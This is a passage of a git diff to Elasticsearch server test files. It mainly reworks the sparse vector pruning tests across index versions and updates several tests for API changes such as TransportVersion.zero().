3ceab2cf204c7..9c451dde85fd3 100644 --- a/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java +++ b/server/src/test/java/org/elasticsearch/index/mapper/vectors/SparseVectorFieldMapperTests.java @@ -16,6 +16,7 @@ import org.apache.lucene.index.LeafReader; import org.apache.lucene.search.BooleanClause; import org.apache.lucene.search.BooleanQuery; +import org.apache.lucene.search.BoostQuery; import org.apache.lucene.search.IndexSearcher; import org.apache.lucene.search.Query; import org.apache.lucene.store.Directory; @@ -38,6 +39,7 @@ import org.elasticsearch.inference.WeightedToken; import org.elasticsearch.search.lookup.Source; import org.elasticsearch.search.vectors.SparseVectorQueryWrapper; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.index.IndexVersionUtils; import org.elasticsearch.xcontent.ToXContent; import org.elasticsearch.xcontent.XContentBuilder; @@ -53,12 +55,17 @@ import java.util.LinkedHashMap; import java.util.List; import java.util.Map; +import java.util.NavigableSet; +import java.util.Set; +import java.util.TreeMap; +import java.util.stream.Collectors; +import java.util.stream.Stream; +import static org.elasticsearch.index.IndexVersions.NEW_SPARSE_VECTOR; import static org.elasticsearch.index.IndexVersions.SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT; +import static org.elasticsearch.index.IndexVersions.SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X; import static org.elasticsearch.index.IndexVersions.UPGRADE_TO_LUCENE_10_0_0; -import static org.elasticsearch.index.mapper.vectors.SparseVectorFieldMapper.NEW_SPARSE_VECTOR_INDEX_VERSION; -import static org.elasticsearch.index.mapper.vectors.SparseVectorFieldMapper.PREVIOUS_SPARSE_VECTOR_INDEX_VERSION; -import static org.elasticsearch.index.mapper.vectors.SparseVectorFieldMapper.SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_VERSION; +import static org.elasticsearch.index.IndexVersions.V_8_0_0; import static org.elasticsearch.test.hamcrest.ElasticsearchAssertions.assertToXContentEquivalent; import static org.elasticsearch.xcontent.XContentFactory.jsonBuilder; import static org.hamcrest.Matchers.containsString; @@ -67,6 +74,22 @@ public class SparseVectorFieldMapperTests extends MapperTestCase { + public static final float STRICT_TOKENS_WEIGHT_THRESHOLD = 0.5f; + public static final float STRICT_TOKENS_FREQ_RATIO_THRESHOLD = 1; + + private static final Map COMMON_TOKENS = Map.of( + "common1_drop_default", + 0.1f, + "common2_drop_default", + 0.1f, + "common3_drop_default", + 0.1f + ); + + private static final Map MEDIUM_TOKENS = Map.of("medium1_keep_strict", 0.5f, "medium2_keep_default", 0.25f); + + private static final Map RARE_TOKENS = Map.of("rare1_keep_strict", 0.9f, "rare2_keep_strict", 0.85f); + @Override protected Object getSampleValueForDocument() { Map map = new LinkedHashMap<>(); @@ -122,7 +145,7 @@ protected void minimalMappingWithExplicitIndexOptions(XContentBuilder b) throws b.field("prune", true); b.startObject("pruning_config"); { - b.field("tokens_freq_ratio_threshold", 3.0f); + b.field("tokens_freq_ratio_threshold", 1.0f); b.field("tokens_weight_threshold", 0.5f); } b.endObject(); @@ -177,6 +200,13 @@ protected void mappingWithIndexOptionsPruneFalse(XContentBuilder b) throws IOExc b.endObject(); } + private void mapping(XContentBuilder b, @Nullable Boolean prune, PruningConfig pruningConfig) throws IOException { + b.field("type", "sparse_vector"); + if (prune != null) { + b.field("index_options", new SparseVectorFieldMapper.IndexOptions(prune, pruningConfig.tokenPruningConfig)); + } + } + @Override protected boolean supportsStoredFields() { return false; @@ -262,7 +292,7 @@ public void testDefaultsWithAndWithoutIncludeDefaultsOlderIndexVersion() throws IndexVersion indexVersion = IndexVersionUtils.randomVersionBetween( random(), UPGRADE_TO_LUCENE_10_0_0, - IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_VERSION) + IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) ); XContentBuilder orig = JsonXContent.contentBuilder().startObject(); @@ -483,7 +513,7 @@ protected IngestScriptSupport ingestScriptSupport() { @Override protected String[] getParseMinimalWarnings(IndexVersion indexVersion) { String[] additionalWarnings = null; - if (indexVersion.before(PREVIOUS_SPARSE_VECTOR_INDEX_VERSION)) { + if (indexVersion.before(V_8_0_0)) { additionalWarnings = new String[] { SparseVectorFieldMapper.ERROR_MESSAGE_7X }; } return Strings.concatStringArrays(super.getParseMinimalWarnings(indexVersion), additionalWarnings); @@ -491,15 +521,11 @@ protected String[] getParseMinimalWarnings(IndexVersion indexVersion) { @Override protected IndexVersion boostNotAllowedIndexVersion() { - return NEW_SPARSE_VECTOR_INDEX_VERSION; + return NEW_SPARSE_VECTOR; } public void testSparseVectorUnsupportedIndex() { - IndexVersion version = IndexVersionUtils.randomVersionBetween( - random(), - PREVIOUS_SPARSE_VECTOR_INDEX_VERSION, - IndexVersions.FIRST_DETACHED_INDEX_VERSION - ); + IndexVersion version = IndexVersionUtils.randomVersionBetween(random(), V_8_0_0, IndexVersions.FIRST_DETACHED_INDEX_VERSION); Exception e = expectThrows(MapperParsingException.class, () -> createMapperService(version, fieldMapping(b -> { b.field("type", "sparse_vector"); }))); @@ -678,14 +704,60 @@ public void testTokensWeightThresholdCorrect() { ); } + private enum PruningScenario { + NO_PRUNING, // No pruning applied - all tokens preserved + DEFAULT_PRUNING, // Default pruning configuration + STRICT_PRUNING // Stricter pruning with higher thresholds + } + + private enum PruningConfig { + NULL(null), + EXPLICIT_DEFAULT(new TokenPruningConfig()), + STRICT(new TokenPruningConfig(STRICT_TOKENS_FREQ_RATIO_THRESHOLD, STRICT_TOKENS_WEIGHT_THRESHOLD, false)); + + public final @Nullable TokenPruningConfig tokenPruningConfig; + + PruningConfig(@Nullable TokenPruningConfig tokenPruningConfig) { + this.tokenPruningConfig = tokenPruningConfig; + } + } + + private final Set validIndexPruningScenarios = Set.of( + new PruningOptions(false, PruningConfig.NULL), + new PruningOptions(true, PruningConfig.NULL), + new PruningOptions(true, PruningConfig.EXPLICIT_DEFAULT), + new PruningOptions(true, PruningConfig.STRICT), + new PruningOptions(null, PruningConfig.NULL) + ); + + private record PruningOptions(@Nullable Boolean prune, PruningConfig pruningConfig) {} + private void withSearchExecutionContext(MapperService mapperService, CheckedConsumer consumer) throws IOException { var mapper = mapperService.documentMapper(); try (Directory directory = newDirectory()) { RandomIndexWriter iw = new RandomIndexWriter(random(), directory); - var sourceToParse = source(this::writeField); - ParsedDocument doc1 = mapper.parse(sourceToParse); - iw.addDocument(doc1.rootDoc()); + + int commonDocs = 20; + for (int i = 0; i < commonDocs; i++) { + iw.addDocument(mapper.parse(source(b -> b.field("field", COMMON_TOKENS))).rootDoc()); + } + + int mediumDocs = 5; + for (int i = 0; i < mediumDocs; i++) { + iw.addDocument(mapper.parse(source(b -> b.field("field", MEDIUM_TOKENS))).rootDoc()); + } + + iw.addDocument(mapper.parse(source(b -> b.field("field", RARE_TOKENS))).rootDoc()); + + // This will lower the averageTokenFreqRatio so that common tokens get pruned with default settings. + // Depending on how the index is created, we will have 30-37 numUniqueTokens + // this will result in an averageTokenFreqRatio of 0.1021 - 0.1259 + Map uniqueDoc = new TreeMap<>(); + for (int i = 0; i < 30; i++) { + uniqueDoc.put("unique" + i, 0.5f); + } + iw.addDocument(mapper.parse(source(b -> b.field("field", uniqueDoc))).rootDoc()); iw.close(); try (DirectoryReader reader = wrapInMockESDirectoryReader(DirectoryReader.open(directory))) { @@ -695,203 +767,139 @@ private void withSearchExecutionContext(MapperService mapperService, CheckedCons } } - public void testTypeQueryFinalizationWithRandomOptions() throws Exception { - for (int i = 0; i < 20; i++) { - runTestTypeQueryFinalization( - randomBoolean(), // useIndexVersionBeforeIndexOptions - randomBoolean(), // useMapperDefaultIndexOptions - randomBoolean(), // setMapperIndexOptionsPruneToFalse - randomBoolean(), // queryOverridesPruningConfig - randomBoolean() // queryOverridesPruneToBeFalse + public void testPruningScenarios() throws Exception { + for (int i = 0; i < 200; i++) { + assertPruningScenario( + randomFrom(validIndexPruningScenarios), + new PruningOptions(randomFrom(true, false, null), randomFrom(PruningConfig.values())) ); } } - public void testTypeQueryFinalizationDefaultsCurrentVersion() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::minimalMapping)); - - // query should be pruned by default on newer index versions - performTypeQueryFinalizationTest(mapperService, null, null, true); + private XContentBuilder getIndexMapping(PruningOptions pruningOptions) throws IOException { + return fieldMapping(b -> mapping(b, pruningOptions.prune, pruningOptions.pruningConfig)); } - public void testTypeQueryFinalizationDefaultsPreviousVersion() throws Exception { - IndexVersion version = IndexVersionUtils.randomVersionBetween( - random(), - UPGRADE_TO_LUCENE_10_0_0, - IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) - ); - MapperService mapperService = createMapperService(version, fieldMapping(this::minimalMapping)); - - // query should _not_ be pruned by default on older index versions - performTypeQueryFinalizationTest(mapperService, null, null, false); - } - - public void testTypeQueryFinalizationWithIndexExplicit() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::minimalMapping)); + private void assertQueryContains(List expectedClauses, Query query) { + SparseVectorQueryWrapper queryWrapper = (SparseVectorQueryWrapper) query; + var termsQuery = queryWrapper.getTermsQuery(); + assertNotNull(termsQuery); + var booleanQuery = (BooleanQuery) termsQuery; - // query should be pruned via explicit index options - performTypeQueryFinalizationTest(mapperService, null, null, true); + Collection shouldClauses = booleanQuery.getClauses(BooleanClause.Occur.SHOULD); + assertThat(shouldClauses, Matchers.containsInAnyOrder(expectedClauses.toArray())); } - public void testTypeQueryFinalizationWithIndexExplicitDoNotPrune() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + private PruningScenario getEffectivePruningScenario( + PruningOptions indexPruningOptions, + PruningOptions queryPruningOptions, + IndexVersion indexVersion + ) { + Boolean shouldPrune = queryPruningOptions.prune; + if (shouldPrune == null) { + shouldPrune = indexPruningOptions.prune; + } - // query should be pruned via explicit index options - performTypeQueryFinalizationTest(mapperService, null, null, false); - } + if (shouldPrune == null) { + shouldPrune = indexVersion.between(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X, UPGRADE_TO_LUCENE_10_0_0) + || indexVersion.onOrAfter(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT); + } - public void testTypeQueryFinalizationQueryOverridesPruning() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + PruningScenario pruningScenario = PruningScenario.NO_PRUNING; + if (shouldPrune) { + PruningConfig pruningConfig = queryPruningOptions.pruningConfig; + if (pruningConfig == PruningConfig.NULL) { + pruningConfig = indexPruningOptions.pruningConfig; + } + pruningScenario = switch (pruningConfig) { + case STRICT -> PruningScenario.STRICT_PRUNING; + case EXPLICIT_DEFAULT, NULL -> PruningScenario.DEFAULT_PRUNING; + }; + } - // query should still be pruned due to query builder setting it - performTypeQueryFinalizationTest(mapperService, true, new TokenPruningConfig(), true); + return pruningScenario; } - public void testTypeQueryFinalizationQueryOverridesPruningOff() throws Exception { - IndexVersion version = IndexVersion.current(); - MapperService mapperService = createMapperService(version, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + private List getExpectedQueryClauses( + SparseVectorFieldMapper.SparseVectorFieldType ft, + PruningScenario pruningScenario, + SearchExecutionContext searchExecutionContext + ) { + List tokens = switch (pruningScenario) { + case NO_PRUNING -> QUERY_VECTORS; + case DEFAULT_PRUNING -> QUERY_VECTORS.stream() + .filter(t -> t.token().startsWith("rare") || t.token().startsWith("medium")) + .toList(); + case STRICT_PRUNING -> QUERY_VECTORS.stream().filter(t -> t.token().endsWith("keep_strict")).toList(); + }; - // query should not pruned due to query builder setting it - performTypeQueryFinalizationTest(mapperService, false, null, false); + return tokens.stream().map(t -> { + Query termQuery = ft.termQuery(t.token(), searchExecutionContext); + return new BoostQuery(termQuery, t.weight()); + }).collect(Collectors.toUnmodifiableList()); } - private void performTypeQueryFinalizationTest( - MapperService mapperService, - @Nullable Boolean queryPrune, - @Nullable TokenPruningConfig queryTokenPruningConfig, - boolean queryShouldBePruned - ) throws IOException { + private void assertPruningScenario(PruningOptions indexPruningOptions, PruningOptions queryPruningOptions) throws IOException { + IndexVersion indexVersion = getIndexVersion(); + MapperService mapperService = createMapperService(indexVersion, getIndexMapping(indexPruningOptions)); + PruningScenario effectivePruningScenario = getEffectivePruningScenario(indexPruningOptions, queryPruningOptions, indexVersion); withSearchExecutionContext(mapperService, (context) -> { SparseVectorFieldMapper.SparseVectorFieldType ft = (SparseVectorFieldMapper.SparseVectorFieldType) mapperService.fieldType( "field" ); - Query finalizedQuery = ft.finalizeSparseVectorQuery(context, "field", QUERY_VECTORS, queryPrune, queryTokenPruningConfig); - - if (queryShouldBePruned) { - assertQueryWasPruned(finalizedQuery); - } else { - assertQueryWasNotPruned(finalizedQuery); - } + List expectedQueryClauses = getExpectedQueryClauses(ft, effectivePruningScenario, context); + Query finalizedQuery = ft.finalizeSparseVectorQuery( + context, + "field", + QUERY_VECTORS, + queryPruningOptions.prune, + queryPruningOptions.pruningConfig.tokenPruningConfig + ); + assertQueryContains(expectedQueryClauses, finalizedQuery); }); } - private void assertQueryWasPruned(Query query) { - assertQueryHasClauseCount(query, 0); + private static IndexVersion getIndexVersion() { + VersionRange versionRange = randomFrom(VersionRange.values()); + return versionRange.getRandomVersion(); } - private void assertQueryWasNotPruned(Query query) { - assertQueryHasClauseCount(query, QUERY_VECTORS.size()); - } - - private void assertQueryHasClauseCount(Query query, int clauseCount) { - SparseVectorQueryWrapper queryWrapper = (SparseVectorQueryWrapper) query; - var termsQuery = queryWrapper.getTermsQuery(); - assertNotNull(termsQuery); - var booleanQuery = (BooleanQuery) termsQuery; - Collection clauses = booleanQuery.getClauses(BooleanClause.Occur.SHOULD); - assertThat(clauses.size(), equalTo(clauseCount)); - } - - /** - * Runs a test of the query finalization based on various parameters - * that provides - * @param useIndexVersionBeforeIndexOptions set to true to use a previous index version before mapper index_options - * @param useMapperDefaultIndexOptions set to false to use an explicit, non-default mapper index_options - * @param setMapperIndexOptionsPruneToFalse set to true to use prune:false in the mapper index_options - * @param queryOverridesPruningConfig set to true to designate the query will provide a pruning_config - * @param queryOverridesPruneToBeFalse if true and queryOverridesPruningConfig is true, the query will provide prune:false - * @throws IOException - */ - private void runTestTypeQueryFinalization( - boolean useIndexVersionBeforeIndexOptions, - boolean useMapperDefaultIndexOptions, - boolean setMapperIndexOptionsPruneToFalse, - boolean queryOverridesPruningConfig, - boolean queryOverridesPruneToBeFalse - ) throws IOException { - MapperService mapperService = getMapperServiceForTest( - useIndexVersionBeforeIndexOptions, - useMapperDefaultIndexOptions, - setMapperIndexOptionsPruneToFalse - ); + private enum VersionRange { + ES_V8X_WITHOUT_INDEX_OPTIONS_SUPPORT( + NEW_SPARSE_VECTOR, + IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X) + ), + ES_V8X_WITH_INDEX_OPTIONS_SUPPORT( + SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT_BACKPORT_8_X, + IndexVersionUtils.getPreviousVersion(UPGRADE_TO_LUCENE_10_0_0) + ), + ES_V9X_WITHOUT_INDEX_OPTIONS_SUPPORT( + UPGRADE_TO_LUCENE_10_0_0, + IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) + ), + ES_V9X_WITH_INDEX_OPTIONS_SUPPORT(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT, IndexVersion.current()); - // check and see if the query should explicitly override the index_options - Boolean shouldQueryPrune = queryOverridesPruningConfig ? (queryOverridesPruneToBeFalse == false) : null; - - // get the pruning configuration for the query if it's overriding - TokenPruningConfig queryPruningConfig = Boolean.TRUE.equals(shouldQueryPrune) ? new TokenPruningConfig() : null; - - // our logic if the results should be pruned or not - // we should _not_ prune if any of the following: - // - the query explicitly overrides the options and `prune` is set to false - // - the query does not override the pruning options and: - // - either we are using a previous index version - // - or the index_options explicitly sets `prune` to false - boolean resultShouldNotBePruned = ((queryOverridesPruningConfig && queryOverridesPruneToBeFalse) - || (queryOverridesPruningConfig == false && (useIndexVersionBeforeIndexOptions || setMapperIndexOptionsPruneToFalse))); - - try { - performTypeQueryFinalizationTest(mapperService, shouldQueryPrune, queryPruningConfig, resultShouldNotBePruned == false); - } catch (AssertionError e) { - String message = "performTypeQueryFinalizationTest failed using parameters: " - + "useIndexVersionBeforeIndexOptions: " - + useIndexVersionBeforeIndexOptions - + ", useMapperDefaultIndexOptions: " - + useMapperDefaultIndexOptions - + ", setMapperIndexOptionsPruneToFalse: " - + setMapperIndexOptionsPruneToFalse - + ", queryOverridesPruningConfig: " - + queryOverridesPruningConfig - + ", queryOverridesPruneToBeFalse: " - + queryOverridesPruneToBeFalse; - throw new AssertionError(message, e); - } - } + private final IndexVersion fromVersion; + private final IndexVersion toVersion; - private IndexVersion getIndexVersionForTest(boolean usePreviousIndex) { - return usePreviousIndex - ? IndexVersionUtils.randomVersionBetween( - random(), - UPGRADE_TO_LUCENE_10_0_0, - IndexVersionUtils.getPreviousVersion(SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT) - ) - : IndexVersionUtils.randomVersionBetween(random(), SPARSE_VECTOR_PRUNING_INDEX_OPTIONS_SUPPORT, IndexVersion.current()); - } - - private MapperService getMapperServiceForTest( - boolean usePreviousIndex, - boolean useIndexOptionsDefaults, - boolean explicitIndexOptionsDoNotPrune - ) throws IOException { - // get the index version of the test to use - // either a current version that supports index options, or a previous version that does not - IndexVersion indexVersion = getIndexVersionForTest(usePreviousIndex); - - // if it's using the old index, we always use the minimal mapping without index_options - if (usePreviousIndex) { - return createMapperService(indexVersion, fieldMapping(this::minimalMapping)); + VersionRange(IndexVersion fromVersion, IndexVersion toVersion) { + this.fromVersion = fromVersion; + this.toVersion = toVersion; } - // if we set explicitIndexOptionsDoNotPrune, the index_options (if present) will explicitly include "prune: false" - if (explicitIndexOptionsDoNotPrune) { - return createMapperService(indexVersion, fieldMapping(this::mappingWithIndexOptionsPruneFalse)); + IndexVersion getRandomVersion() { + // TODO: replace implementation with `IndexVersionUtils::randomVersionBetween` once support is added + // for handling unbalanced version distributions. + NavigableSet allReleaseVersions = IndexVersionUtils.allReleasedVersions(); + Set candidateVersions = allReleaseVersions.subSet(fromVersion, toVersion); + return ESTestCase.randomFrom(candidateVersions); } - - // either return the default (minimal) mapping or one with an explicit pruning_config - return useIndexOptionsDefaults - ? createMapperService(indexVersion, fieldMapping(this::minimalMapping)) - : createMapperService(indexVersion, fieldMapping(this::minimalMappingWithExplicitIndexOptions)); } - private static List QUERY_VECTORS = List.of( - new WeightedToken("pugs", 0.5f), - new WeightedToken("cats", 0.4f), - new WeightedToken("is", 0.1f) - ); + private static final List QUERY_VECTORS = Stream.of(RARE_TOKENS, MEDIUM_TOKENS, COMMON_TOKENS) + .flatMap(map -> map.entrySet().stream()) + .map(entry -> new WeightedToken(entry.getKey(), entry.getValue())) + .collect(Collectors.toList()); /** * Handles float/double conversion when reading/writing with xcontent by converting all numbers to floats. diff --git a/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java b/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java index 283bbbc9b100d..553a3b9811e3f 100644 --- a/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/index/query/SpanMultiTermQueryBuilderTests.java @@ -28,7 +28,6 @@ import org.apache.lucene.store.Directory; import org.apache.lucene.tests.index.RandomIndexWriter; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.compress.CompressedXContent; import org.elasticsearch.common.io.stream.StreamOutput; @@ -168,7 +167,7 @@ public String fieldName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java b/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java index 182bd4d6b5b86..13812ec341f23 100644 --- a/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java +++ b/server/src/test/java/org/elasticsearch/index/query/WildcardQueryBuilderTests.java @@ -114,6 +114,7 @@ public void testFromJson() throws IOException { checkGeneratedJson(json, parsed); assertEquals(json, "ki*y", parsed.value()); assertEquals(json, 2.0, parsed.boost(), 0.0001); + assertEquals(new WildcardQueryBuilder("user", "ki*y", false).caseInsensitive(true).boost(2.0f), parsed); } public void testParseFailsWithMultipleFields() throws IOException { diff --git a/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java b/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java index 58743213566bf..f87a6c46f82f6 100644 --- a/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java +++ b/server/src/test/java/org/elasticsearch/index/shard/RemoveCorruptedShardDataCommandTests.java @@ -54,6 +54,7 @@ import org.elasticsearch.test.CorruptionUtils; import org.elasticsearch.test.DummyShardLock; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.junit.Before; import java.io.IOException; @@ -77,6 +78,7 @@ import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.startsWith; +@WithoutEntitlements // commands don't run with entitlements enforced public class RemoveCorruptedShardDataCommandTests extends IndexShardTestCase { private ShardId shardId; diff --git a/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java b/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java index 74e68c39e78fa..8032eda2dba1a 100644 --- a/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java +++ b/server/src/test/java/org/elasticsearch/index/translog/TranslogTests.java @@ -27,7 +27,6 @@ import org.apache.lucene.tests.util.LuceneTestCase; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.common.Randomness; import org.elasticsearch.common.Strings; @@ -3465,7 +3464,7 @@ public void testTranslogOpSerialization() throws Exception { TransportVersion wireVersion = TransportVersionUtils.randomVersionBetween( random(), - TransportVersions.MINIMUM_COMPATIBLE, + TransportVersion.minimumCompatible(), TransportVersion.current() ); BytesStreamOutput out = new BytesStreamOutput(); diff --git a/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java b/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java index a48ba63882734..78df6c9e88c65 100644 --- a/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java +++ b/server/src/test/java/org/elasticsearch/indices/IndicesServiceCloseTests.java @@ -77,7 +77,8 @@ private Node startNode() throws NodeValidationException { Node node = new MockNode( settings, Arrays.asList(getTestTransportPlugin(), MockHttpTransport.TestPlugin.class, InternalSettingsPlugin.class), - true + true, + () -> {} ); node.start(); return node; diff --git a/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java b/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java index 19eb662dd0c05..c9673e1285ffd 100644 --- a/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java +++ b/server/src/test/java/org/elasticsearch/indices/cluster/ClusterStateChanges.java @@ -103,7 +103,6 @@ import org.elasticsearch.indices.TestIndexNameExpressionResolver; import org.elasticsearch.snapshots.EmptySnapshotsInfoService; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ClusterServiceUtils; import org.elasticsearch.test.gateway.TestGatewayAllocator; import org.elasticsearch.threadpool.ThreadPool; @@ -234,8 +233,7 @@ protected ExecutorService createThreadPoolExecutor() { .address(boundAddress.publishAddress()) .build(), clusterSettings, - Collections.emptySet(), - Tracer.NOOP + Collections.emptySet() ) { @Override public Transport.Connection getConnection(DiscoveryNode node) { diff --git a/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java b/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java index f4d601c7ad3b4..0b3e50974a827 100644 --- a/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java +++ b/server/src/test/java/org/elasticsearch/rest/action/document/RestBulkActionTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.rest.action.document; import org.apache.lucene.util.SetOnce; +import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.DocWriteRequest; import org.elasticsearch.action.bulk.BulkRequest; @@ -18,12 +19,12 @@ import org.elasticsearch.action.index.IndexRequest; import org.elasticsearch.action.update.UpdateRequest; import org.elasticsearch.client.internal.Client; +import org.elasticsearch.client.internal.node.NodeClient; import org.elasticsearch.common.bytes.BytesArray; import org.elasticsearch.common.bytes.ReleasableBytesReference; import org.elasticsearch.common.settings.ClusterSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.core.Releasable; -import org.elasticsearch.http.HttpBody; import org.elasticsearch.index.IndexVersion; import org.elasticsearch.index.IndexingPressure; import org.elasticsearch.rest.RestChannel; @@ -31,6 +32,7 @@ import org.elasticsearch.telemetry.metric.MeterRegistry; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.client.NoOpNodeClient; +import org.elasticsearch.test.rest.FakeHttpBodyStream; import org.elasticsearch.test.rest.FakeRestChannel; import org.elasticsearch.test.rest.FakeRestRequest; import org.elasticsearch.xcontent.XContentType; @@ -201,6 +203,24 @@ public void bulk(BulkRequest request, ActionListener listener) { } } + public void testIncrementalBulkMissingContent() { + assertThrows( + ElasticsearchParseException.class, + () -> new RestBulkAction( + Settings.EMPTY, + ClusterSettings.createBuiltInClusterSettings(), + new IncrementalBulkService(mock(Client.class), mock(IndexingPressure.class), MeterRegistry.NOOP) + ).handleRequest( + new FakeRestRequest.Builder(xContentRegistry()).withPath("my_index/_bulk") + .withContentLength(0) + .withBody(new FakeHttpBodyStream()) + .build(), + mock(RestChannel.class), + mock(NodeClient.class) + ) + ); + } + public void testIncrementalParsing() { ArrayList> docs = new ArrayList<>(); AtomicBoolean isLast = new AtomicBoolean(false); @@ -208,21 +228,7 @@ public void testIncrementalParsing() { FakeRestRequest request = new FakeRestRequest.Builder(xContentRegistry()).withPath("my_index/_bulk") .withMethod(RestRequest.Method.POST) - .withBody(new HttpBody.Stream() { - @Override - public void close() {} - - @Override - public ChunkHandler handler() { - return null; - } - - @Override - public void addTracingHandler(ChunkHandler chunkHandler) {} - - @Override - public void setHandler(ChunkHandler chunkHandler) {} - + .withBody(new FakeHttpBodyStream() { @Override public void next() { next.set(true); diff --git a/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java b/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java index 1e638f8e7b30e..5c55b05bb2c70 100644 --- a/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java +++ b/server/src/test/java/org/elasticsearch/search/SearchModuleTests.java @@ -9,7 +9,6 @@ package org.elasticsearch.search; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.CheckedBiConsumer; import org.elasticsearch.common.io.stream.GenericNamedWriteable; import org.elasticsearch.common.io.stream.StreamInput; @@ -527,7 +526,7 @@ private static TestAggregationBuilder fromXContent(String name, XContentParser p @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } @@ -580,7 +579,7 @@ protected void validate(ValidationContext context) {} @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } @@ -616,7 +615,7 @@ public RescoreContext innerBuildContext(int windowSize, SearchExecutionContext c @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } @@ -662,7 +661,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java b/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java index 9ef888da81596..5111b43feed8a 100644 --- a/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java +++ b/server/src/test/java/org/elasticsearch/search/SearchServiceSingleNodeTests.java @@ -21,7 +21,6 @@ import org.apache.lucene.util.SetOnce; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.DocWriteResponse; import org.elasticsearch.action.OriginalIndices; @@ -44,6 +43,7 @@ import org.elasticsearch.action.support.WriteRequest; import org.elasticsearch.client.internal.Client; import org.elasticsearch.cluster.metadata.IndexMetadata; +import org.elasticsearch.cluster.routing.RecoverySource; import org.elasticsearch.cluster.routing.ShardRouting; import org.elasticsearch.cluster.routing.ShardRoutingState; import org.elasticsearch.cluster.routing.TestShardRouting; @@ -1255,8 +1255,22 @@ public void testBeforeShardLockDuringShardCreate() { TestShardRouting.newShardRouting( new ShardId(indexService.index(), 0), randomAlphaOfLength(5), - randomBoolean(), - ShardRoutingState.INITIALIZING + true, + ShardRoutingState.INITIALIZING, + 